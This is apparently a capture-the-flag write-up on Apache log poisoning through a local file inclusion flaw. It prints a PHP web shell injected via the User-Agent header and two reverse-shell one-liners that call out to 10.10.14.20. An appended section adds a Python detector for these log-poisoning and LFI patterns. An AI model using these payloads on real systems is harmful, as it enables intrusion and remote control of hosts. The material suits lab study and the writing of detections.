Apache log

Example from 10.10.10.84

URL http://10.10.10.84/browse.php?file=/var/log/httpd-access.log exposing the Apache log files:

Error message when contaminating the log with:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/3333 0>&1'");?>

Second try (the reason for the error message was that the " character could not be processed by the log file). Changing to:

User-Agent: <?php system($_REQUEST['cmd']); ?>

We gain code execution through LFI:

The same request in Burp (useful when log files are full of data)

Gaining a reverse shell from FreeBSD through LFI with:

if [ -e /tmp/OGfWimIImwJMI ];then rm /tmp/OGfWimIImwJMI;fi;mkfifo /tmp/OGfWimIImwJMI;cat /tmp/OGfWimIImwJMI|/bin/csh -i 2>&1|nc 10.10.14.20 3333 > /tmp/OGfWimIImwJMI
Mind the /bin/csh, as users on this box do not have bash!

Make sure you URL encode the command in Burp before sending:

Result:
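Added example, not part of the original notes: a small Python detector that parses Apache combined-format access-log lines and flags the two indicators this writeup relies on, a PHP open tag landing in an attacker-controlled header field (log poisoning) and a file= parameter that reads a log path (the LFI used to include it). The log lines are constructed samples and the regexes are my own assumptions, not an official signature set.

```python
import re

# Apache "combined" log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Assumed detection patterns (not an official ruleset): a PHP open tag smuggled
# into a logged field, and a file= parameter pointing at a log or system file.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
LOG_PATH_RE = re.compile(r'file=/?(?:\.\./)*(var/log|etc/passwd|proc/self)', re.IGNORECASE)


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Return finding labels for one access-log line (empty list if nothing suspicious)."""
    rec = parse_combined(line)
    if rec is None:
        return ["unparsable"]
    findings = []
    # Request line, Referer and User-Agent are all client-controlled and all get logged.
    for field in ("request", "referer", "agent"):
        if PHP_TAG_RE.search(rec[field]):
            findings.append(f"php-tag-in-{field}")
    if LOG_PATH_RE.search(rec["request"]):
        findings.append("lfi-log-read")
    return findings


def scan(lines):
    """Map line index -> findings for every line that triggered at least one rule."""
    results = {}
    for i, line in enumerate(lines):
        findings = classify(line)
        if findings:
            results[i] = findings
    return results


# Constructed sample log lines mirroring the sequence in the writeup (not real box data).
SAMPLE_LOG = [
    '10.10.14.20 - - [02/Jan/2020:10:00:00 +0000] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.10.14.20 - - [02/Jan/2020:10:00:05 +0000] "GET / HTTP/1.1" 200 42 "-" "<?php system($_REQUEST[\'cmd\']); ?>"',
    '10.10.14.20 - - [02/Jan/2020:10:00:09 +0000] "GET /browse.php?file=/var/log/httpd-access.log&cmd=id HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.168.1.5 - - [02/Jan/2020:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 1337 "-" "curl/7.64.1"',
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_LOG).items():
        print(idx, labels)
```

A log read followed shortly by a PHP tag from the same client is the sequence that matters here; the flat per-line labels are enough to correlate that in a SIEM.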

Reference:

Shellpop - allowed me to construct the reverse shell for FreeBSD.